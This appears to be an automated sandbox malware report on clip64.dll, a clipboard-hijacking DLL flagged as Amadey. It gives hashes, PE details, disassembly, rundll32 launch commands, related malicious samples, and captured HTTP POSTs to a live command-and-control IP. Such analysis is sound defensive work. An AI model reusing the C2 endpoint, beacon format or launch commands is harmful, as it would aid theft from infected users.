                    2QaN4hOyJs.exeGet hashmaliciousXWormBrowse
                    • 13.107.246.63
                    WwVs3PavPg.exeGet hashmaliciousUnknownBrowse
                    • 13.107.246.63
                    Tsy9P2T9yF.exeGet hashmaliciousUnknownBrowse
                    • 13.107.246.63
                    http://www.eventcreate.com/e/you-have-received-a-new-docGet hashmaliciousHTMLPhisherBrowse
                    • 13.107.246.63
                    gTU8ed4669.exeGet hashmaliciousCredential FlusherBrowse
                    • 13.107.246.63
                    zSmMqGGeVy.exeGet hashmaliciousUnknownBrowse
                    • 13.107.246.63

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    SPD-NETTRcred64.dll.dllGet hashmaliciousAmadeyBrowse
                    • 212.193.31.8
                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                    • 212.193.31.8
                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                    • 212.193.31.8
                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                    • 212.193.31.8
                    6X4odkIkyK.exeGet hashmaliciousAmadeyBrowse
                    • 212.193.31.8
                    mips.elfGet hashmaliciousMiraiBrowse
                    • 185.72.8.231
                    ppc.elfGet hashmaliciousMiraiBrowse
                    • 185.72.8.231
                    nshkmpsl.elfGet hashmaliciousMiraiBrowse
                    • 185.72.8.231
                    mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                    • 2.58.124.230

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.358923113331074
                    TrID:
                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                    • Generic Win/DOS Executable (2004/3) 0.20%
                    • DOS Executable Generic (2002/1) 0.20%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:clip64.dll
                    File size:126'976 bytes
                    MD5:7fe5b933ed9391ea24647479c80e904e
                    SHA1:963721e46b8056e2e883c598e95d7daa7bdf8d9b
                    SHA256:2e12355cb9b11c923dc06f195399d678bc46680e982856d9405f64e7563fe8b3
                    SHA512:82d92d0c5155fff5ce97099cb9e78422ff328e0c516fbab7634e624215366c2191ec6ff6fe8d939268275c6770accb208af7ac69c3cc13c9188a49ef41339bb0
                    SSDEEP:3072:wdkSZXB8ZuzQT7SgmEE8An/Y4Z3SNq6ZidU1ep/:LoGymSgjE8A3Z3yodUwp/
                    TLSH:6BC34B213496C031DA5D567E18A8ABF487BD6914DFB00DE777840E3B8E642C2EE34D7A
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P............................................................................@.......@.......@.~.....@.......Rich...........

                    File Icon

                    Icon Hash:7ae282899bbab082

                    Static PE Info

                    General

                    Entrypoint:0x10007062
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x10000000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x676432FA [Thu Dec 19 14:51:38 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:fdb088ba51afbf555d7a0f495212d8f1

                    Entrypoint Preview

                    Instruction
                    push ebp
                    mov ebp, esp
                    cmp dword ptr [ebp+0Ch], 01h
                    jne 00007F81092F7317h
                    call 00007F81092F76EAh
                    push dword ptr [ebp+10h]
                    push dword ptr [ebp+0Ch]
                    push dword ptr [ebp+08h]
                    call 00007F81092F71C3h
                    add esp, 0Ch
                    pop ebp
                    retn 000Ch
                    jmp 00007F81092FB032h
                    push ebp
                    mov ebp, esp
                    sub esp, 0Ch
                    lea ecx, dword ptr [ebp-0Ch]
                    call 00007F81092F68C5h
                    push 1001C6E0h
                    lea eax, dword ptr [ebp-0Ch]
                    push eax
                    call 00007F81092F7D7Dh
                    int3
                    push ebp
                    mov ebp, esp
                    and dword ptr [1001F708h], 00000000h
                    sub esp, 24h
                    or dword ptr [1001E00Ch], 01h
                    push 0000000Ah
                    call dword ptr [10016050h]
                    test eax, eax
                    je 00007F81092F74BFh
                    and dword ptr [ebp-10h], 00000000h
                    xor eax, eax
                    push ebx
                    push esi
                    push edi
                    xor ecx, ecx
                    lea edi, dword ptr [ebp-24h]
                    push ebx
                    cpuid
                    mov esi, ebx
                    pop ebx
                    mov dword ptr [edi], eax
                    mov dword ptr [edi+04h], esi
                    mov dword ptr [edi+08h], ecx
                    xor ecx, ecx
                    mov dword ptr [edi+0Ch], edx
                    mov eax, dword ptr [ebp-24h]
                    mov edi, dword ptr [ebp-1Ch]
                    mov dword ptr [ebp-0Ch], eax
                    xor edi, 6C65746Eh
                    mov eax, dword ptr [ebp-18h]
                    xor eax, 49656E69h
                    mov dword ptr [ebp-08h], eax
                    mov eax, dword ptr [ebp-20h]
                    xor eax, 756E6547h
                    mov dword ptr [ebp-04h], eax
                    xor eax, eax
                    inc eax
                    push ebx
                    cpuid
                    mov esi, ebx
                    pop ebx
                    lea ebx, dword ptr [ebp-24h]
                    mov dword ptr [ebx], eax
                    mov eax, dword ptr [ebp-04h]
                    mov dword ptr [ebx+04h], esi
                    or eax, edi
                    or eax, dword ptr [ebp-08h]

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x1cd100x9c.rdata
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1cdac0x50.rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x200000xf8.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x210000x1af8.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x1bb4c0x38.rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1bb880x40.rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x160000x14c.rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                    Sections

                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    .text0x10000x143060x14400c5367438634515ddeffb97d8398daef5False0.5099585262345679data6.5424517950156895IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata0x160000x752a0x760065440752dc27683442670c610d77c6fbFalse0.4289261122881356data5.152405366954554IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data0x1e0000x1fec0x1400070ceab71158e4b98b9fbb2974a658d3False0.094140625data1.5445177251659354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x200000xf80x2009f59a1f7f3b6dfefbfe8605086b5888eFalse0.333984375data2.5080557656497993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc0x210000x1af80x1c004b1ffd192b91d9aa86f1e88eeac86ab5False0.7540457589285714data6.519144570462316IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Resources

                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_MANIFEST0x200600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793

                    Imports

                    DLLImport
                    KERNEL32.dllGlobalAlloc, GlobalLock, GlobalUnlock, WideCharToMultiByte, Sleep, WriteConsoleW, CloseHandle, CreateFileW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, WriteFile, FlushFileBuffers, SetStdHandle, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, RaiseException, InterlockedFlushSList, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, DecodePointer
                    USER32.dllEmptyClipboard, SetClipboardData, CloseClipboard, GetClipboardData, OpenClipboard
                    WININET.dllInternetOpenW, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetCloseHandle

                    Exports

                    NameOrdinalAddress
                    ??4CClipperDLL@@QAEAAV0@$$QAV0@@Z10x10001d60
                    ??4CClipperDLL@@QAEAAV0@ABV0@@Z20x10001d60
                    Main30x100059a0

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Suricata IDS Alerts

                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                    2024-12-23T06:46:41.952354+01002856151ETPRO MALWARE Amadey CnC Activity M71192.168.2.949731212.193.31.880TCP
                    2024-12-23T06:46:44.592932+01002856151ETPRO MALWARE Amadey CnC Activity M71192.168.2.949738212.193.31.880TCP

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Dec 23, 2024 06:46:19.956660032 CET4973180192.168.2.9212.193.31.8
                    Dec 23, 2024 06:46:20.076246023 CET8049731212.193.31.8192.168.2.9
                    Dec 23, 2024 06:46:20.076380968 CET4973180192.168.2.9212.193.31.8
                    Dec 23, 2024 06:46:20.079505920 CET4973180192.168.2.9212.193.31.8
                    Dec 23, 2024 06:46:20.200107098 CET8049731212.193.31.8192.168.2.9
                    Dec 23, 2024 06:46:22.569062948 CET4973880192.168.2.9212.193.31.8
                    Dec 23, 2024 06:46:22.688580036 CET8049738212.193.31.8192.168.2.9
                    Dec 23, 2024 06:46:22.688711882 CET4973880192.168.2.9212.193.31.8
                    Dec 23, 2024 06:46:22.689810991 CET4973880192.168.2.9212.193.31.8
                    Dec 23, 2024 06:46:22.809307098 CET8049738212.193.31.8192.168.2.9
                    Dec 23, 2024 06:46:41.952269077 CET8049731212.193.31.8192.168.2.9
                    Dec 23, 2024 06:46:41.952353954 CET4973180192.168.2.9212.193.31.8
                    Dec 23, 2024 06:46:41.952599049 CET4973180192.168.2.9212.193.31.8
                    Dec 23, 2024 06:46:42.072016001 CET8049731212.193.31.8192.168.2.9
                    Dec 23, 2024 06:46:44.592859983 CET8049738212.193.31.8192.168.2.9
                    Dec 23, 2024 06:46:44.592931986 CET4973880192.168.2.9212.193.31.8
                    Dec 23, 2024 06:46:44.594854116 CET4973880192.168.2.9212.193.31.8
                    Dec 23, 2024 06:46:44.714346886 CET8049738212.193.31.8192.168.2.9

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Dec 23, 2024 06:46:08.168919086 CET1.1.1.1192.168.2.90x2670No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                    Dec 23, 2024 06:46:08.168919086 CET1.1.1.1192.168.2.90x2670No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • 212.193.31.8

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.949731212.193.31.8807612C:\Windows\SysWOW64\rundll32.exe
                    TimestampBytes transferredDirectionData
                    Dec 23, 2024 06:46:20.079505920 CET161OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 212.193.31.8
                    Content-Length: 5
                    Cache-Control: no-cache
                    Data Raw: 77 6c 74 3d 31
                    Data Ascii: wlt=1


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.949738212.193.31.8807748C:\Windows\SysWOW64\rundll32.exe
                    TimestampBytes transferredDirectionData
                    Dec 23, 2024 06:46:22.689810991 CET161OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 212.193.31.8
                    Content-Length: 5
                    Cache-Control: no-cache
                    Data Raw: 77 6c 74 3d 31
                    Data Ascii: wlt=1


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:00:46:12
                    Start date:23/12/2024
                    Path:C:\Windows\System32\loaddll32.exe
                    Wow64 process (32bit):true
                    Commandline:loaddll32.exe "C:\Users\user\Desktop\clip64.dll"
                    Imagebase:0x5b0000
                    File size:126'464 bytes
                    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:1
                    Start time:00:46:12
                    Start date:23/12/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff70f010000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:2
                    Start time:00:46:12
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
                    Imagebase:0xc50000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:3
                    Start time:00:46:12
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:4
                    Start time:00:46:12
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:6
                    Start time:00:46:15
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:7
                    Start time:00:46:18
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe C:\Users\user\Desktop\clip64.dll,Main
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:9
                    Start time:00:46:21
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:10
                    Start time:00:46:21
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:11
                    Start time:00:46:21
                    Start date:23/12/2024
                    Path:C:\Windows\SysWOW64\rundll32.exe
                    Wow64 process (32bit):true
                    Commandline:rundll32.exe "C:\Users\user\Desktop\clip64.dll",Main
                    Imagebase:0xf40000
                    File size:61'440 bytes
                    MD5 hash:889B99C52A60DD49227C5E485A016679
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:3.6%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:2.2%
                      Total number of Nodes:1025
                      Total number of Limit Nodes:39
                      execution_graph 9803 6eb0eab0 9806 6eb0eac7 9803->9806 9805 6eb0eac2 9807 6eb0ead5 9806->9807 9808 6eb0eae9 9806->9808 9809 6eb0b686 _free 14 API calls 9807->9809 9810 6eb0eaf1 9808->9810 9811 6eb0eb03 9808->9811 9812 6eb0eada 9809->9812 9813 6eb0b686 _free 14 API calls 9810->9813 9818 6eb0eb01 9811->9818 9820 6eb09c9c 9811->9820 9815 6eb099cc ___std_exception_copy 25 API calls 9812->9815 9816 6eb0eaf6 9813->9816 9819 6eb0eae5 9815->9819 9817 6eb099cc ___std_exception_copy 25 API calls 9816->9817 9817->9818 9818->9805 9819->9805 9821 6eb09cbc 9820->9821 9822 6eb09cb3 9820->9822 9821->9822 9828 6eb0b2cc GetLastError 9821->9828 9822->9818 9829 6eb0b2e3 9828->9829 9830 6eb0b2e9 9828->9830 9831 6eb0d05d __dosmaperr 6 API calls 9829->9831 9832 6eb0d09c __dosmaperr 6 API calls 9830->9832 9854 6eb0b2ef SetLastError 9830->9854 9831->9830 9833 6eb0b307 9832->9833 9834 6eb0b8b2 __dosmaperr 14 API calls 9833->9834 9833->9854 9835 6eb0b317 9834->9835 9837 6eb0b336 9835->9837 9838 6eb0b31f 9835->9838 9843 6eb0d09c __dosmaperr 6 API calls 9837->9843 9841 6eb0d09c __dosmaperr 6 API calls 9838->9841 9839 6eb0b383 9863 6eb0adfe 9839->9863 9840 6eb09cdc 9855 6eb0b699 9840->9855 9844 6eb0b32d 9841->9844 9846 6eb0b342 9843->9846 9850 6eb0b90f _free 14 API calls 9844->9850 9847 6eb0b346 9846->9847 9848 6eb0b357 9846->9848 9851 6eb0d09c __dosmaperr 6 API calls 9847->9851 9849 6eb0b0ce __dosmaperr 14 API calls 9848->9849 9852 6eb0b362 9849->9852 9850->9854 9851->9844 9853 6eb0b90f _free 14 API calls 9852->9853 9853->9854 9854->9839 9854->9840 9856 6eb09cf2 9855->9856 9857 6eb0b6ac 9855->9857 9859 6eb0b6c6 9856->9859 9857->9856 9925 6eb0e03c 9857->9925 9860 6eb0b6ee 9859->9860 9861 6eb0b6d9 9859->9861 9860->9822 9861->9860 9947 6eb0c87e 9861->9947 9874 6eb0d590 9863->9874 9866 6eb0ae0e 9868 6eb0ae18 IsProcessorFeaturePresent 9866->9868 9869 6eb0ae37 9866->9869 9870 6eb0ae24 9868->9870 9904 6eb0a34a 9869->9904 9873 6eb09820 CallCatchBlock 8 API calls 9870->9873 9873->9869 9907 6eb0d4c2 9874->9907 9877 6eb0d5d5 9878 6eb0d5e1 CallCatchBlock 9877->9878 9879 6eb0d608 CallCatchBlock 9878->9879 9880 6eb0b423 __dosmaperr 14 API calls 9878->9880 9886 6eb0d60e CallCatchBlock 9878->9886 9881 6eb0d655 9879->9881 9879->9886 9903 6eb0d63f 9879->9903 9880->9879 9882 6eb0b686 _free 14 API calls 9881->9882 9883 6eb0d65a 9882->9883 9884 6eb099cc ___std_exception_copy 25 API calls 9883->9884 9884->9903 9885 6eb0d681 9889 6eb0d6c3 9885->9889 9890 6eb0d7b4 9885->9890 9900 6eb0d6f2 9885->9900 9886->9885 9918 6eb0b7d4 EnterCriticalSection 9886->9918 9895 6eb0b2cc _unexpected 37 API calls 9889->9895 9889->9900 9892 6eb0d7bf 9890->9892 9923 6eb0b81c LeaveCriticalSection 9890->9923 9894 6eb0a34a CallCatchBlock 23 API calls 9892->9894 9896 6eb0d7c7 9894->9896 9898 6eb0d6e7 9895->9898 9897 6eb0b2cc _unexpected 37 API calls 9901 6eb0d747 9897->9901 9899 6eb0b2cc _unexpected 37 API calls 9898->9899 9899->9900 9919 6eb0d761 9900->9919 9902 6eb0b2cc _unexpected 37 API calls 9901->9902 9901->9903 9902->9903 9903->9866 9905 6eb0a1f0 CallCatchBlock 23 API calls 9904->9905 9906 6eb0a35b 9905->9906 9908 6eb0d4ce CallCatchBlock 9907->9908 9913 6eb0b7d4 EnterCriticalSection 9908->9913 9910 6eb0d4dc 9914 6eb0d51a 9910->9914 9913->9910 9917 6eb0b81c LeaveCriticalSection 9914->9917 9916 6eb0ae03 9916->9866 9916->9877 9917->9916 9918->9885 9920 6eb0d767 9919->9920 9921 6eb0d738 9919->9921 9924 6eb0b81c LeaveCriticalSection 9920->9924 9921->9897 9921->9901 9921->9903 9923->9892 9924->9921 9926 6eb0e048 CallCatchBlock 9925->9926 9927 6eb0b2cc _unexpected 37 API calls 9926->9927 9928 6eb0e051 9927->9928 9935 6eb0e097 9928->9935 9938 6eb0b7d4 EnterCriticalSection 9928->9938 9930 6eb0e06f 9939 6eb0e0bd 9930->9939 9935->9856 9936 6eb0adfe __FrameHandler3::FrameUnwindToState 37 API calls 9937 6eb0e0bc 9936->9937 9938->9930 9940 6eb0e0cb __dosmaperr 9939->9940 9942 6eb0e080 9939->9942 9941 6eb0ddf0 __dosmaperr 14 API calls 9940->9941 9940->9942 9941->9942 9943 6eb0e09c 9942->9943 9946 6eb0b81c LeaveCriticalSection 9943->9946 9945 6eb0e093 9945->9935 9945->9936 9946->9945 9948 6eb0b2cc _unexpected 37 API calls 9947->9948 9949 6eb0c888 9948->9949 9952 6eb0c796 9949->9952 9953 6eb0c7a2 CallCatchBlock 9952->9953 9955 6eb0c7bc 9953->9955 9963 6eb0b7d4 EnterCriticalSection 9953->9963 9957 6eb0c7c3 9955->9957 9959 6eb0adfe __FrameHandler3::FrameUnwindToState 37 API calls 9955->9959 9956 6eb0c7f8 9964 6eb0c815 9956->9964 9957->9860 9961 6eb0c835 9959->9961 9960 6eb0c7cc 9960->9956 9962 6eb0b90f _free 14 API calls 9960->9962 9962->9956 9963->9960 9967 6eb0b81c LeaveCriticalSection 9964->9967 9966 6eb0c81c 9966->9955 9967->9966 9980 6eb016a0 9985 6eb05d90 9980->9985 9982 6eb016b1 10001 6eb06b05 9982->10001 9988 6eb05dd4 9985->9988 9989 6eb05dae __InternalCxxFrameHandler 9985->9989 9986 6eb05ebe 10022 6eb01ec0 9986->10022 9988->9986 9991 6eb05e28 9988->9991 9992 6eb05e4d 9988->9992 9989->9982 9990 6eb05ec3 10045 6eb01e20 9990->10045 9991->9990 10004 6eb067d0 9991->10004 9996 6eb067d0 26 API calls 9992->9996 9998 6eb05e39 __InternalCxxFrameHandler 9992->9998 9996->9998 9997 6eb05eb9 10017 6eb099dc 9997->10017 9998->9997 9999 6eb05ea0 9998->9999 9999->9982 10080 6eb06ad8 10001->10080 10005 6eb067d5 ___std_exception_copy 10004->10005 10006 6eb067ef 10005->10006 10007 6eb09eaa __dosmaperr 2 API calls 10005->10007 10008 6eb067f1 10005->10008 10006->9998 10007->10005 10009 6eb067fb 10008->10009 10010 6eb01e20 Concurrency::cancel_current_task 10008->10010 10013 6eb07b0e std::_Xinvalid_argument RaiseException 10009->10013 10051 6eb07b0e 10010->10051 10012 6eb01e3c 10054 6eb07a8c 10012->10054 10015 6eb070a6 10013->10015 10018 6eb09968 ___std_exception_copy 25 API calls 10017->10018 10019 6eb099eb 10018->10019 10020 6eb099f9 ___std_exception_copy 11 API calls 10019->10020 10021 6eb099f8 10020->10021 10069 6eb06751 10022->10069 10046 6eb01e2e Concurrency::cancel_current_task 10045->10046 10047 6eb07b0e std::_Xinvalid_argument RaiseException 10046->10047 10048 6eb01e3c 10047->10048 10049 6eb07a8c ___std_exception_copy 25 API calls 10048->10049 10050 6eb01e63 10049->10050 10052 6eb07b55 RaiseException 10051->10052 10053 6eb07b28 10051->10053 10052->10012 10053->10052 10055 6eb01e63 10054->10055 10057 6eb07a99 ___std_exception_copy 10054->10057 10055->9998 10056 6eb07ac6 10059 6eb0ada7 ___std_exception_copy 14 API calls 10056->10059 10057->10055 10057->10056 10060 6eb0ae42 10057->10060 10059->10055 10061 6eb0ae5d 10060->10061 10062 6eb0ae4f 10060->10062 10063 6eb0b686 _free 14 API calls 10061->10063 10062->10061 10067 6eb0ae74 10062->10067 10064 6eb0ae65 10063->10064 10065 6eb099cc ___std_exception_copy 25 API calls 10064->10065 10066 6eb0ae6f 10065->10066 10066->10056 10067->10066 10068 6eb0b686 _free 14 API calls 10067->10068 10068->10064 10074 6eb066b0 10069->10074 10072 6eb07b0e std::_Xinvalid_argument RaiseException 10073 6eb06770 10072->10073 10077 6eb06660 10074->10077 10078 6eb07a8c ___std_exception_copy 25 API calls 10077->10078 10079 6eb0668c 10078->10079 10079->10072 10081 6eb06ae7 10080->10081 10082 6eb06aee 10080->10082 10086 6eb0ab30 10081->10086 10089 6eb0ab9c 10082->10089 10085 6eb016bb 10087 6eb0ab9c 28 API calls 10086->10087 10088 6eb0ab42 10087->10088 10088->10085 10092 6eb0a8b3 10089->10092 10093 6eb0a8bf CallCatchBlock 10092->10093 10100 6eb0b7d4 EnterCriticalSection 10093->10100 10095 6eb0a8cd 10101 6eb0a92d 10095->10101 10097 6eb0a8da 10111 6eb0a902 10097->10111 10100->10095 10102 6eb0a949 10101->10102 10103 6eb0a9c0 __dosmaperr 10101->10103 10102->10103 10104 6eb0a9a0 10102->10104 10114 6eb0cd7b 10102->10114 10103->10097 10104->10103 10106 6eb0cd7b 28 API calls 10104->10106 10108 6eb0a9b6 10106->10108 10107 6eb0a996 10109 6eb0b90f _free 14 API calls 10107->10109 10110 6eb0b90f _free 14 API calls 10108->10110 10109->10104 10110->10103 10149 6eb0b81c LeaveCriticalSection 10111->10149 10113 6eb0a8eb 10113->10085 10115 6eb0cda3 10114->10115 10116 6eb0cd88 10114->10116 10118 6eb0cdb2 10115->10118 10123 6eb0ed96 10115->10123 10116->10115 10117 6eb0cd94 10116->10117 10119 6eb0b686 _free 14 API calls 10117->10119 10130 6eb0edc9 10118->10130 10122 6eb0cd99 CallCatchBlock 10119->10122 10122->10107 10124 6eb0eda1 10123->10124 10125 6eb0edb6 HeapSize 10123->10125 10126 6eb0b686 _free 14 API calls 10124->10126 10125->10118 10127 6eb0eda6 10126->10127 10128 6eb099cc ___std_exception_copy 25 API calls 10127->10128 10129 6eb0edb1 10128->10129 10129->10118 10131 6eb0ede1 10130->10131 10132 6eb0edd6 10130->10132 10134 6eb0edf2 __dosmaperr 10131->10134 10135 6eb0ede9 10131->10135 10142 6eb0b833 10132->10142 10137 6eb0edf7 10134->10137 10138 6eb0ee1c HeapReAlloc 10134->10138 10141 6eb09eaa __dosmaperr 2 API calls 10134->10141 10136 6eb0b90f _free 14 API calls 10135->10136 10139 6eb0edde 10136->10139 10140 6eb0b686 _free 14 API calls 10137->10140 10138->10134 10138->10139 10139->10122 10140->10139 10141->10134 10143 6eb0b871 10142->10143 10144 6eb0b841 __dosmaperr 10142->10144 10146 6eb0b686 _free 14 API calls 10143->10146 10144->10143 10145 6eb0b85c HeapAlloc 10144->10145 10148 6eb09eaa __dosmaperr 2 API calls 10144->10148 10145->10144 10147 6eb0b86f 10145->10147 10146->10147 10147->10139 10148->10144 10149->10113 9780 6eb0b423 GetLastError 9781 6eb0b440 9780->9781 9782 6eb0b43a 9780->9782 9783 